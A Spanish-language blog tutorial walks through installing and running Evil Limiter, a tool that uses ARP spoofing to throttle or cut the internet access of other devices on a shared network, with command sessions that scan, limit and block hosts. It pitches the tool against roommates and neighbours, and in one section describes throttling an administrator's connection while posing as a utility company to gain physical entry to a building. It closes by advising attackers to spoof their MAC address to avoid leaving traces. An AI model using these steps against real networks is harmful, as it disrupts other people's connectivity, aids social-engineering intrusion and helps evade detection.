Shutterstock 179770802

Evil Limiter


Erik172logo
Erik Garcia

Si se encuentra con un compañero de cuarto que acapara el ancho de banda de datos limitado con videojuegos o descubre que un vecino se ha invitado a su red Wi-Fi, puede recuperar fácilmente el control de su acceso a Internet. Evil Limiter hace esto al permitirle controlar la velocidad de bits de cualquier dispositivo en la misma red que usted, lo que le permite reducir o incluso detener la velocidad de transferencia de datos por completo.

 

En términos generales, el usuario promedio no tiene mucha visibilidad sobre quien o que hay en su red, por lo que cualquier persona con la contraseña puede ingresar y comenzar a usar el ancho de banda. En otras situaciones, un compañero de cuarto o un miembro de la familia puede estar acaparando todo el ancho de banda injustamente para jugar videojuegos o transmitir videos. Algunos enrutadores tienen interfaces web que le permiten establecer límites en cada conexión, pero sin la contraseña del enrutador, es posible que esta opción no sea accesible.

 

Evil Limiter utiliza la falsificación de ARP para hacer que los dispositivos envíen datos a la computadora atacante en lugar de al enrutador, lo que nos permite enviar los datos al enrutador a la velocidad que deseemos. Gracias a la forma en que funciona el protocolo ARP, es posible controlar la velocidad de cualquier dispositivo en una conexión de red compartida. Sin embargo, debido a que la falsificación de ARP solo funciona en redes IPv4, esta herramienta no sera efectiva en IPv6 por ahora.

 

Evil Limiter para Hackers

 

Para un hacker, Evil Limiter permite una fácil orientación de uno, algunos o todos los dispositivos en una red. Es fácil cortar el cable en Internet de un dispositivo en particular en cualquier momento, lo que permite un pretexto conveniente para un ataque de ingeniería social. Si un pirata informático quisiera acceder a un área exclusiva para empleados, podría identificar el dispositivo de los empleados en el área que desea, y luego limitar la velocidad de su conexión.


En lugar de aparecer sin previo aviso, un pirata informático podría estrangular la conexión de datos del administrador mientras finge llamar desde la compañía de servicios públicos para preguntar si la conexión a Internet ha sido lenta. Cuando el administrador descubre que Internet es realmente lento, el pirata informático simplemente pide el mejor momento para enviar a alguien a repararlo, dándole un pretexto para ingresar al edificio y evitando que el objetivo llame a la compañía de servicios públicos real.

 

Lo que necesitaras

 

Para usar Evil Limiter, necesitara un sistema Linux como Kali o Ubuntu con Python3 o superior. Si bien una ventaja poderosa de Evil Limter es que se puede ejecutar en redes incluso cuando no tiene privilegios de administrador, le recomiendo asegurarse de que tiene permiso para ejecutar la herramienta en cualquier red en la que desee probarla.

Evil Limiter usa el paquete ARP para limitar las velocidades de conexión que están presentes en las redes IPv4, pero no en las redes IPv6. Debido a esto, los sistemas IPv6 estan fuera del alcance de esta herramienta, como se mencionó anteriormente.

 

Instalar EvilLimiter

 

Para instalar Evil Limiter, solo hay unos pocos comandos para lanzar en una ventana de terminal, como se ve a continuación. Cuando las bibliotecas necesarias terminen de instalarse, Evil Limiter debe estar instalado y listo para ejecutarse.

 


                    $ git clone https://github.com/bitbrute/evillimiter.git
                    $ cd evillimiter
                    $ sudo python3 setup.py install
                    

 

 

Conectando a la red.


Ahora, deberá conectarse a su red de destino. Después, puede ejecutar Evil Limiter escribiendo evillimiter en una nueva ventana de terminal. Deberías ver algo como a continuación.

 

~# evillimiter

                        ███████╗██╗   ██╗██╗██╗       ██╗     ██╗███╗   ███╗██╗████████╗███████╗██████╗
                        ██╔════╝██║   ██║██║██║       ██║     ██║████╗ ████║██║╚══██╔══╝██╔════╝██╔══██╗
                        █████╗  ██║   ██║██║██║       ██║     ██║██╔████╔██║██║   ██║   █████╗  ██████╔╝
                        ██╔══╝  ╚██╗ ██╔╝██║██║       ██║     ██║██║╚██╔╝██║██║   ██║   ██╔══╝  ██╔══██╗
                        ███████╗ ╚████╔╝ ██║███████╗  ███████╗██║██║ ╚═╝ ██║██║   ██║   ███████╗██║  ██║    
                        ╚══════╝  ╚═══╝  ╚═╝╚══════╝  ╚══════╝╚═╝╚═╝     ╚═╝╚═╝   ╚═╝   ╚══════╝╚═╝  ╚═╝       
                                        by bitbrute  ~  limit devices on your network :3
                                                            v1.1.0
                        
                        OK   interface: wlan0
                        OK   gateway ip: 192.168.5.1
                        OK   gateway mac: 84:██:██:██:██:1a
                        OK   netmask: 255.255.255.0
                        
                        type help or ? to show command information.
                    

 

Si ve esto, Evil Limiter está instalado, conectado a la red y listo para funcionar.


Ver los comandos disponibles


Puede explorar la funcionalidad de Evil Limiter mirando a través del sistema de menús y revisando los comandos disponibles. Para hacerlo, escriba un signo de interrogación en el terminal para abrir la página de ayuda.

(Main) >>> ?

                    scan                          scans for online hosts on your network.
                                                  required to find the hosts you want to limit.
                    
                    hosts                         lists all scanned hosts.
                                                  contains host information, including IDs.
                    
                    limit [ID1,ID2,...] [rate]    limits bandwith of host(s) (uload/dload).
                                                  e.g.: limit 4 100kbit
                                                        limit 2,3,4 1gbit
                                                        limit all 200kbit
                    
                    block [ID1,ID2,...]           blocks internet access of host(s).
                                                  e.g.: block 3,2
                                                        block all
                    
                    free [ID1,ID2,...]            unlimits/unblocks host(s).
                                                  e.g.: free 3
                                                        free all
                    
                    add [IP] (--mac [MAC])        adds custom host to host list.
                                                  mac resolved automatically.
                                                  e.g.: add 192.168.178.24
                                                        add 192.168.1.50 --mac 1c:fc:bc:2d:a6:37
                    
                    clear                         clears the terminal window.
                

Descubre dispositivos


Como podemos ver arriba, los comandos son sencillos. Para buscar dispositivos en la red, todo lo que necesita hacer es scan.


                    (Main) >>> scan

                    100% |██████████████████████████████| 256/256
                    OK   7 hosts discovered.
                

La exploración detendrá cualquier otro host en la red. Escriba hosts para mostrarlos a todos.


                    (Main) >>> hosts

                    ┌Hosts──────────────┬───────────────────┬──────────┬────────┐
                    │ ID │ IP-Address   │ MAC-Address       │ Hostname │ Status │
                    ├────┼──────────────┼───────────────────┼──────────┼────────┤
                    │ 0  │ 192.168.5.1  │ 84:██:██:██:██:1a │ _gateway │ Free   │
                    │ 1  │ 192.168.5.2  │ 0c:██:██:██:██:f5 │          │ Free   │
                    │ 2  │ 192.168.5.4  │ 3c:██:██:██:██:6f │          │ Free   │
                    │ 3  │ 192.168.5.24 │ 60:██:██:██:██:78 │          │ Free   │
                    │ 4  │ 192.168.5.25 │ c4:██:██:██:██:2b │          │ Free   │
                    │ 5  │ 192.168.5.61 │ 8c:██:██:██:██:f5 │          │ Free   │
                    │ 6  │ 192.168.5.67 │ f0:██:██:██:██:b5 │          │ Free   │
                    └────┴──────────────┴───────────────────┴──────────┴────────┘
                

En mi ejemplo, se han descubierto 7 dispositivos en la red, uno de ellos es el enrutador. Ahora tenemos una lista de objetivos con la que podemos bloquear o limitar el acceso, así que probémoslo.

limitar o bloquear dispositivos


Si desea limitar todos los dispositivos excepto el enrutador, puede enumerarlos uno por uno después del comando de límite. También deberá especificar la velocidad a la que desea limitarlos. En mi caso, iré con 200kbit como la velocidad límite.

Puede usar el comando limit all para elegir todo, pero como desea dejar el enrutador solo, escriba el comando limit 1,2,3,4,5,6 en su lugar para comenzar a limitar esos dispositivos específicos. La cantidad de dispositivos que enumera depende de cuántos haya encontrado.


                    (Main) >>> limit 1,2,3,4,5,6 200kbit

                    OK   192.168.5.2 limited to 200kbit.
                    OK   192.168.5.4 limited to 200kbit.
                    OK   192.168.5.24 limited to 200kbit.
                    OK   192.168.5.25 limited to 200kbit.
                    OK   192.168.5.61 limited to 200kbit.
                    OK   192.168.5.67 limited to 200kbit.
                

Ahora que hemos limitado algunos dispositivos, también podemos seleccionar los dispositivos que queremos bloquear por completo para que no accedan a la red. He descubierto que a veces Evil Limiter puede ser duro mientras se limitan las conexiones, y el resultado es que los dispositivos están tan limitados que podrían bloquearse.

Para bloquear un dispositivo, escriba el comando block, luego el número de cualquier dispositivo que desee evitar que reciba datos a través de la red.


                    (Main) >>> block 3

                    OK   192.168.5.24 blocked.
                

Prueba con los anfitriones por segunda vez. La mayoría de la red debe estar bloqueada o limitada. hosts


                    (Main) >>> hosts

                    ┌Hosts──────────────┬───────────────────┬──────────┬─────────┐
                    │ ID │ IP-Address   │ MAC-Address       │ Hostname │ Status  │
                    ├────┼──────────────┼───────────────────┼──────────┼─────────┤
                    │ 0  │ 192.168.5.1  │ 84:██:██:██:██:1a │ _gateway │ Free    │
                    │ 1  │ 192.168.5.2  │ 0c:██:██:██:██:f5 │          │ Limited │
                    │ 2  │ 192.168.5.4  │ 3c:██:██:██:██:6f │          │ Limited │
                    │ 3  │ 192.168.5.24 │ 60:██:██:██:██:78 │          │ Blocked │
                    │ 4  │ 192.168.5.25 │ c4:██:██:██:██:2b │          │ Limited │
                    │ 5  │ 192.168.5.61 │ 8c:██:██:██:██:f5 │          │ Limited │
                    │ 6  │ 192.168.5.67 │ f0:██:██:██:██:b5 │          │ Limited │
                    └────┴──────────────┴───────────────────┴──────────┴─────────┘
                

Restaurar la conexión normal


Ahora que ha causado el caos en la red, es hora de volver a poner las cosas como estaban. Afortunadamente, hacerlo es fácil. Puede optar por restaurar los dispositivos uno por uno o ejecutarlos libremente para deshacer cualquier limitación en los dispositivos de red. Con el comando free all


                    (Main) >>> free all

                    OK   192.168.5.2 freed.
                    OK   192.168.5.4 freed.
                    OK   192.168.5.24 freed.
                    OK   192.168.5.25 freed.
                    OK   192.168.5.61 freed.
                    OK   192.168.5.67 freed.
                

Ejecute hosts por tercera vez, y el acceso a la red debería ser normal nuevamente para todos los dispositivos.


                    (Main) >>> hosts

                    ┌Hosts──────────────┬───────────────────┬──────────┬────────┐
                    │ ID │ IP-Address   │ MAC-Address       │ Hostname │ Status │
                    ├────┼──────────────┼───────────────────┼──────────┼────────┤
                    │ 0  │ 192.168.5.1  │ 84:██:██:██:██:1a │ _gateway │ Free   │
                    │ 1  │ 192.168.5.2  │ 0c:██:██:██:██:f5 │          │ Free   │
                    │ 2  │ 192.168.5.4  │ 3c:██:██:██:██:6f │          │ Free   │
                    │ 3  │ 192.168.5.24 │ 60:██:██:██:██:78 │          │ Free   │
                    │ 4  │ 192.168.5.25 │ c4:██:██:██:██:2b │          │ Free   │
                    │ 5  │ 192.168.5.61 │ 8c:██:██:██:██:f5 │          │ Free   │
                    │ 6  │ 192.168.5.67 │ f0:██:██:██:██:b5 │          │ Free   │
                    └────┴──────────────┴───────────────────┴──────────┴────────┘
                

 

Evil Limiter es efectivo pero agresivo


En mis pruebas con Evil Limiter, encontré que era una herramienta extremadamente efectiva, aunque a veces dominante. En ocasiones, mis intentos de limitar un objetivo lo bloquearían por completo, así que asegúrese de probar la efectividad de esta herramienta antes de usarla en cualquier lugar importante.

Una cosa a tener en cuenta cuando se usa Evil Limiter es que la falsificación de ARP expone su dirección MAC, por lo que el uso de esta herramienta en una red le dice a todos que su dirección MAC es el enrutador. Eso deja su dirección MAC en el caché ARP de cada máquina a la que apunta, así que asegúrese de falsificar su dirección MAC antes de usar esta herramienta si no quiere dejar las huellas digitales de su máquina en toda la red. 

https://z0172ck.me/Hacking/evillimiter



Artículos que te pueden interesar


Este articulo pretende desarrollar el uso de Enum4linux para realizar la enumeración de información a través del Protocolo SMB a un equipo en Wi... Cristian Jose Acuña Ramirez


Continuar Leyendo

El sistema de archivos de proceso de memoria es una manera fácil y conveniente de acceder a la memoria física como archivos de un sistema de arc... Omar Jacobo Muñoz Veliz


Continuar Leyendo

Un atacante puede hacer uso de formularios no sanitizados para hacer cargas de Shell, y así poder ejecutar comandos remotos desde su equipo a un... Cristian Jose Acuña Ramirez


Continuar Leyendo